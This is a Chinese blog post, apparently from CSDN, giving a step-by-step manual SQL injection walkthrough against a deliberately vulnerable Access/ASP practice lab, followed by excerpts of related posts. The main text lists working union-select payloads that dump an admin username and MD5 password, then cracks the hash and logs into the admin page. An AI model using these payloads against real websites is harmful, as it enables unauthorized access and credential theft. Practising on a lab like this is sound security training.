Access手工注入靶场(附环境搭建)

最新推荐文章于 2024-09-27 21:41:13 发布
最新推荐文章于 2024-09-27 21:41:13 发布
阅读量586 收藏 10
点赞数 11
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82061181/article/details/141353102
版权

链接: https://pan.baidu.com/s/1ls-kOD30Hs-jQebcOCLDKQ 提取码: lsz1

环境搭建

步骤一:将环境附件下载到wwwroot下面

步骤二:访问IIS绑定的IP地址

sql注入流程

步骤一:新闻中心 -> 公司新闻

步骤二:判断注入方式

输入' 数据报错

结果为数字型

步骤三:判断列数

?id=14 order by 7

?id=14 order by 8 数据报错

列数为7

步骤四:判断表名

?id=14 union select 1,2,3,4,5,6,7 from admin

?id=14 union select 1,2,3,4,5,6,7 from administrator

经多次判断得出表名为administrator

步骤五:判断字段

?id=14 union select 1,tablename,3,4,5,6,7 from administrator 数据报错

?id=14 union select 1,user_name,3,4,5,6,7 from administrator

?id=14 union select 1,user_name,3,4,password,6,7 from administrator

得出用户名admin 密码 21232f297a57a5a743894a0e4a801fc3

步骤六:利用md5在线解密破解

md5在线解密破解,md5解密加密 (cmd5.com)

得出结果admin

步骤七:利用御剑搜索后台登录

/admin/index.asp

最后输入用户名和密码

云舒zovn
关注
Access 靶场环境搭建
08-20
这里就是我们的 Access 靶场资源文件了,只需要我们把zip文件下载下来,并解压就好 ,内包含各种漏洞练习,适用于教育和测试安全专业人员以及开发者的网络安全技能。
【墨者学院】SQL手工注入漏洞测试(Access数据库)
weixin_43884770的博客
12-04 1172
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行SQL注入测试,获取管理密码登录。 1、判断注入点: 分别用and...
access手工注入靶场环境搭建
qq_45079558的博客
08-20 145
判断字段列数,输入order by 4正常 ,输入order by 5 不正常,判断为4列。输入id=1 and 1=2 union select 1,2,3,4 from admin。将错误发送到浏览器改为‘True’ 将启用父路径改为‘True’将靶场的压缩包解压到当前的根目录下(一键三连截图私聊发靶场压缩包)访问IIS服务器绑定的IP地址,即可访问网站靶场。点击服务器主页下的IIS下的ASP。输入id=1 and 1=1正常。先在电脑的搜索框中搜索IIS。点击应用池下的网站的高级设置。
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
整理比较全的Access SQL注入参考
09-14
Access SQL 注入参考 Access SQL 注入数据库安全领域中的一种常见的攻击手法,通过向 Access 数据库注入恶意的 SQL 代码,攻击者可以读取、修改或删除敏感数据。本文档旨在整理 Access SQL 注入的相关知识点,...
[OPEN SQL] SELECT语句
Hudas的博客
09-23 563
本文主要讲解OPEN SQL读取数据的SELECT语句相关知识点
Transact-SQL概述(SQL Server 2022)
brucexia的专栏
09-23 1307
Transact-SQL是Microsoft公司在关系数据库管理系统SQL Server中的SQL3标准的实现,是微软对SQL的扩展。在SQL Server中,所有与服务器实例的通信都是通过发送Transact-SQL语句到服务器来实现的。根据其完成的具体功能,可以将Transact-SQL语句分为四大类,分别为数据操作语句、数据定义语句、数据控制语句和一些加的语言元素。
【YashanDB知识库】yashandb执行包含带oracle dblink表的sql时性能差
cod0410的博客
09-25 529
yashandb在访问远端oracle的数据时,拉取了表的所有列。并且每批次只拉取16条数据,在网络有时延时(现场网络时延0.4ms),会有额外的网络传输耗时。使用oci编程可以验证yashandb访问oracle dblink远端表在不同情况下的性能表现。yashandb通过dblink访问oracle性能不佳,影响业务运行效率及客户体验。规避方式为在远端oracle侧创建视图,只查询需要的列。使用OCI驱动编程使用示例 中提供的例子可以分析oci的耗时。1、只从dblink拉取查询需要的列数据。
Postgresql特殊关键字
czjnoe的博客
09-25 284
表字段名称如果出现这些特殊关键字,则需要通过单引号访问字段,如offset、group。PostgreSQL特殊关键字。
渗透测试工具 sqlmap 基础教程
2301_77160226的博客
09-25 663
一旦发现漏洞,sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 注入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并注意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
Python 课程18-SQLAlchemy
tim654654的博客
09-25 1129
SQLAlchemy ORM 中,表结构通过 Python 类表示。每个类代表数据库中的一张表,类的属性代表表中的列。定义模型类__tablename__ = 'users' # 表名SQLAlchemy 的func模块使得我们能够使用数据库中的聚合函数,如COUNTSUMMAX等。聚合查询# 查询用户的最大年龄# 计算特定条件下的总人数。
【达梦数据库】存储过程统计模式下表信息-SQL改写
weixin_47686079的博客
09-26 358
在一次Oracle迁移Dm的过程中,源库&目的库大小写均敏感,执行客户提供的SQL脚本的过程中发现,表ip_address被系统默认成了表IP_ADDRESS。经过分析,客户提供的SQL没有使用双引号,来确保Oracle和Dm数据库按照指定的大小写来识别表名,因此,做以下改写。
PostgreSQL 17新特性merge语法增强
最新发布
zxrhhm的博客
09-27 383
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
Chat2DB:AI驱动SQL编辑器,开启智能数据库管理新时代
进击的码农
09-25 950
SQL编辑器是帮助数据库开发者编写、执行和调试SQL语句的工具。虽然许多开发环境和网页工具都支持SQL编写,但要做到优秀的SQL编辑器并非易事。一个理想的SQL编辑器不仅需要提供语法高亮、自动补全等基础功能,还需要具备高效的语法校验、错误提示、代码格式化和高性能的执行结果展示能力。
脏读查询SQL SELECT查询配置(DM8:达梦数据库)
qq_37358909的博客
09-25 365
在某些增删改事务中 , 往一张表增删改数据时 , sql 未提交事务 , 查询表 数据显示 0 , 这时可以配置脏读 , 可以看到表中已经写入的数据设置某条查询语句为脏读。
多智能体笔记本专家系统:集成CrewAI、Ollama和自定义Text-to-SQL工具
李孟的博客
09-25 291
利用多智能体AI、CrewAI、Ollama和自定义Text-to-SQL工具实现个性化笔记本推荐
主流NoSQL及应用场景详解
qq_22201881的博客
09-24 1377
(编注0:本文以下内容英文出处:Kristóf Kovács)NoSQL数据库之间的不同,远超过两 SQL数据库之间的差别。针对这种情况,这里 Cassandra、 Mongodb、 CouchDB、 Redis、 Riak、 Membase、 Neo4j 和 HBase 进行了比较。我承认对 Cassandra有偏见,一部分是因为它本身的臃肿和复杂性,也因为 Java的问题(配置,出现异常,等等)虽然采用简单数据或以键值索引的哈希表,但也支持复杂操作,例如 ZREVRANGEBYSCORE。
虚谷中使用PL/SQL改变模式下所有表的大小写
m0_56058732的博客
09-26 300
首先,我们需要查询出指定模式下的所有表名,在xugu中,数据字典dba_tables包含了当前库下的所有表信息,我们可以使用游标(CURSOR)来遍历这些表名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值